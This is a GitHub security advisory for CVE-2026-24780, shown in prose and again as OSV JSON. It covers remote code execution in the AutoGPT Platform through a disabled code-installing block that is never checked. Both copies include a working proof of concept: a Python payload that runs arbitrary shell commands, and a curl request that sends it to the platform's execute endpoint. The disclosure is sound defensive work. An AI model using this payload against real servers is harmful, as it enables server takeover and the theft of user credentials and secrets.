GHSA-R277-3XC5-C79V
Vulnerability from github – Published: 2026-01-29 15:04 – Updated: 2026-01-30 00:04Summary
AutoGPT Platform's block execution endpoints (both main web API and external API) allow executing blocks by UUID without checking the disabled flag. Any authenticated user can execute the disabled BlockInstallationBlock, which writes arbitrary Python code to the server filesystem and executes it via __import__(), achieving Remote Code Execution. In default self-hosted deployments where Supabase signup is enabled, an attacker can self-register; if signup is disabled (e.g., hosted), the attacker needs an existing account.
Details
Two vulnerable endpoints exist:
- Main Web API (
v1.py#L355-395) - Any authenticated user:
@v1_router.post(
path="/blocks/{block_id}/execute",
dependencies=[Security(requires_user)], # Just requires login
)
async def execute_graph_block(block_id: str, data: BlockInput, ...):
obj = get_block(block_id)
if not obj:
raise HTTPException(status_code=404, ...)
# NO CHECK FOR obj.disabled!
async for name, data in obj.execute(data, ...):
output[name].append(data)
- External API (
external/v1/routes.py#L79-93) - Same issue.
The external API is gated by API key permissions, but any authenticated user can mint API keys with arbitrary permissions via the main API (including EXECUTE_BLOCK) at v1.py#L1408-1424. As a result, a low-privilege user can create an API key and invoke the external block execution route.
The disabled flag is documented but not enforced:
From block.py#L459:
"disabled: If the block is disabled, it will not be available for execution."
The block listing endpoint correctly filters disabled blocks (if not b.disabled), but the execution endpoints do not check this flag.
The dangerous block (blocks/block.py#L15-78):
class BlockInstallationBlock(Block):
"""
NOTE: This block allows remote code execution on the server,
and it should be used for development purposes only.
"""
def __init__(self):
super().__init__(
id="45e78db5-03e9-447f-9395-308d712f5f08", # Hardcoded, public UUID
disabled=True, # NOT ENFORCED!
)
async def run(self, input_data: Input, **kwargs) -> BlockOutput:
code = input_data.code
# Writes attacker code to server filesystem
file_path = f"{block_dir}/{file_name}.py"
with open(file_path, "w") as f:
f.write(code)
# Executes via import (RCE)
module = __import__(module_name, fromlist=[class_name])
PoC
1. Create malicious block code
PAYLOAD = '''
import os
from backend.data.block import Block, BlockOutput, BlockSchemaInput, BlockSchemaOutput
from backend.data.model import SchemaField
class RCEBlock(Block):
class Input(BlockSchemaInput):
cmd: str = SchemaField(description="Command")
class Output(BlockSchemaOutput):
result: str = SchemaField(description="Result")
def __init__(self):
super().__init__(
id="aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee",
description="RCE",
input_schema=self.Input,
output_schema=self.Output,
)
async def run(self, input_data, **kwargs):
import subprocess
result = subprocess.check_output(input_data.cmd, shell=True).decode()
yield "result", result
'''
2. Execute via main web API (any logged-in user)
# Get session cookie by logging into the web UI, then:
curl -X POST "https://platform.autogpt.app/api/blocks/45e78db5-03e9-447f-9395-308d712f5f08/execute" \
-H "Cookie: session=<your_session_cookie>" \
-H "Content-Type: application/json" \
-d '{"code": "<PAYLOAD>"}'
The malicious Python code is written to the server's backend/blocks/ directory and immediately executed via __import__().
Alternative route: Mint an API key with EXECUTE_BLOCK via POST /api-keys, then call the external API POST /external-api/v1/blocks/{id}/execute.
Impact
Any user who can create an account on AutoGPT Platform can achieve full Remote Code Execution on the backend server.
This allows: - Complete server compromise - Access to all user data, credentials, and API keys stored in the database - Access to environment variables (cloud credentials, secrets) - Lateral movement to connected infrastructure (Redis, PostgreSQL, cloud services) - Persistent backdoor installation
Attack requirements:
- Create a free account on the platform (default self-hosted enables signup; hosted deployments may disable signup, requiring an existing account)
- Know the disabled block's UUID (hardcoded in public source code: 45e78db5-03e9-447f-9395-308d712f5f08)
Why the disabled flag exists but fails:
- Block listing correctly filters disabled blocks (users don't see them in UI)
- Execution endpoints bypass this check entirely
- The UUID is static and publicly known from the open-source codebase
Severity note: CVSS assumes the default self-hosted configuration where signup is enabled (low-privilege authentication is easy to obtain). If signup is disabled in a hosted deployment, likelihood is lower, but impact remains critical once any authenticated account exists.
A fix is available, but was not published to the PyPI registry at time of publication: 0.6.44
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "agpt"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.2.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-24780"
],
"database_specific": {
"cwe_ids": [
"CWE-276",
"CWE-863",
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-29T15:04:03Z",
"nvd_published_at": "2026-01-29T18:16:17Z",
"severity": "HIGH"
},
"details": "### Summary\n\nAutoGPT Platform\u0027s block execution endpoints (both main web API and external API) allow executing blocks by UUID without checking the `disabled` flag. Any authenticated user can execute the disabled `BlockInstallationBlock`, which writes arbitrary Python code to the server filesystem and executes it via `__import__()`, achieving Remote Code Execution. In default self-hosted deployments where Supabase signup is enabled, an attacker can self-register; if signup is disabled (e.g., hosted), the attacker needs an existing account.\n\n### Details\n\n**Two vulnerable endpoints exist:**\n\n1. **Main Web API** ([`v1.py#L355-395`](https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/api/features/v1.py#L355-L395)) - Any authenticated user:\n\n```python\n@v1_router.post(\n path=\"/blocks/{block_id}/execute\",\n dependencies=[Security(requires_user)], # Just requires login\n)\nasync def execute_graph_block(block_id: str, data: BlockInput, ...):\n obj = get_block(block_id)\n if not obj:\n raise HTTPException(status_code=404, ...)\n\n # NO CHECK FOR obj.disabled!\n\n async for name, data in obj.execute(data, ...):\n output[name].append(data)\n```\n\n2. **External API** ([`external/v1/routes.py#L79-93`](https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/api/external/v1/routes.py#L79-L93)) - Same issue.\n\nThe external API is gated by API key permissions, but any authenticated user can mint API keys with arbitrary permissions via the main API (including `EXECUTE_BLOCK`) at [`v1.py#L1408-1424`](https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/api/features/v1.py#L1408-L1424). As a result, a low-privilege user can create an API key and invoke the external block execution route.\n\n**The disabled flag is documented but not enforced:**\n\nFrom [`block.py#L459`](https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/data/block.py#L459):\n\u003e \"disabled: If the block is disabled, it will not be available for execution.\"\n\nThe block listing endpoint correctly filters disabled blocks (`if not b.disabled`), but the execution endpoints do not check this flag.\n\n**The dangerous block ([`blocks/block.py#L15-78`](https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/blocks/block.py#L15-L78)):**\n\n```python\nclass BlockInstallationBlock(Block):\n \"\"\"\n NOTE: This block allows remote code execution on the server,\n and it should be used for development purposes only.\n \"\"\"\n\n def __init__(self):\n super().__init__(\n id=\"45e78db5-03e9-447f-9395-308d712f5f08\", # Hardcoded, public UUID\n disabled=True, # NOT ENFORCED!\n )\n\n async def run(self, input_data: Input, **kwargs) -\u003e BlockOutput:\n code = input_data.code\n\n # Writes attacker code to server filesystem\n file_path = f\"{block_dir}/{file_name}.py\"\n with open(file_path, \"w\") as f:\n f.write(code)\n\n # Executes via import (RCE)\n module = __import__(module_name, fromlist=[class_name])\n```\n\n### PoC\n\n**1. Create malicious block code**\n\n```python\nPAYLOAD = \u0027\u0027\u0027\nimport os\nfrom backend.data.block import Block, BlockOutput, BlockSchemaInput, BlockSchemaOutput\nfrom backend.data.model import SchemaField\n\nclass RCEBlock(Block):\n class Input(BlockSchemaInput):\n cmd: str = SchemaField(description=\"Command\")\n class Output(BlockSchemaOutput):\n result: str = SchemaField(description=\"Result\")\n\n def __init__(self):\n super().__init__(\n id=\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\n description=\"RCE\",\n input_schema=self.Input,\n output_schema=self.Output,\n )\n\n async def run(self, input_data, **kwargs):\n import subprocess\n result = subprocess.check_output(input_data.cmd, shell=True).decode()\n yield \"result\", result\n\u0027\u0027\u0027\n```\n\n**2. Execute via main web API (any logged-in user)**\n\n```bash\n# Get session cookie by logging into the web UI, then:\ncurl -X POST \"https://platform.autogpt.app/api/blocks/45e78db5-03e9-447f-9395-308d712f5f08/execute\" \\\n -H \"Cookie: session=\u003cyour_session_cookie\u003e\" \\\n -H \"Content-Type: application/json\" \\\n -d \u0027{\"code\": \"\u003cPAYLOAD\u003e\"}\u0027\n```\n\nThe malicious Python code is written to the server\u0027s `backend/blocks/` directory and immediately executed via `__import__()`.\n\n**Alternative route:** Mint an API key with `EXECUTE_BLOCK` via `POST /api-keys`, then call the external API `POST /external-api/v1/blocks/{id}/execute`.\n\n### Impact\n\n**Any user who can create an account on AutoGPT Platform can achieve full Remote Code Execution on the backend server.**\n\nThis allows:\n- Complete server compromise\n- Access to all user data, credentials, and API keys stored in the database\n- Access to environment variables (cloud credentials, secrets)\n- Lateral movement to connected infrastructure (Redis, PostgreSQL, cloud services)\n- Persistent backdoor installation\n\n**Attack requirements:**\n- Create a free account on the platform (default self-hosted enables signup; hosted deployments may disable signup, requiring an existing account)\n- Know the disabled block\u0027s UUID (hardcoded in public source code: `45e78db5-03e9-447f-9395-308d712f5f08`)\n\n**Why the `disabled` flag exists but fails:**\n- Block listing correctly filters disabled blocks (users don\u0027t see them in UI)\n- Execution endpoints bypass this check entirely\n- The UUID is static and publicly known from the open-source codebase\n\n**Severity note:** CVSS assumes the default self-hosted configuration where signup is enabled (low-privilege authentication is easy to obtain). If signup is disabled in a hosted deployment, likelihood is lower, but impact remains critical once any authenticated account exists.\n\nA fix is available, but was not published to the PyPI registry at time of publication: [0.6.44](https://github.com/Significant-Gravitas/AutoGPT/releases/tag/v0.6.44)",
"id": "GHSA-r277-3xc5-c79v",
"modified": "2026-01-30T00:04:18Z",
"published": "2026-01-29T15:04:03Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/Significant-Gravitas/AutoGPT/security/advisories/GHSA-r277-3xc5-c79v"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24780"
},
{
"type": "PACKAGE",
"url": "https://github.com/Significant-Gravitas/AutoGPT"
},
{
"type": "WEB",
"url": "https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/api/external/v1/routes.py#L79-L93"
},
{
"type": "WEB",
"url": "https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/api/features/v1.py#L1408-L1424"
},
{
"type": "WEB",
"url": "https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/api/features/v1.py#L355-L395"
},
{
"type": "WEB",
"url": "https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/blocks/block.py#L15-L78"
},
{
"type": "WEB",
"url": "https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/data/block.py#L459"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P",
"type": "CVSS_V4"
}
],
"summary": "AutoGPT is Vulnerable to RCE via Disabled Block Execution"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.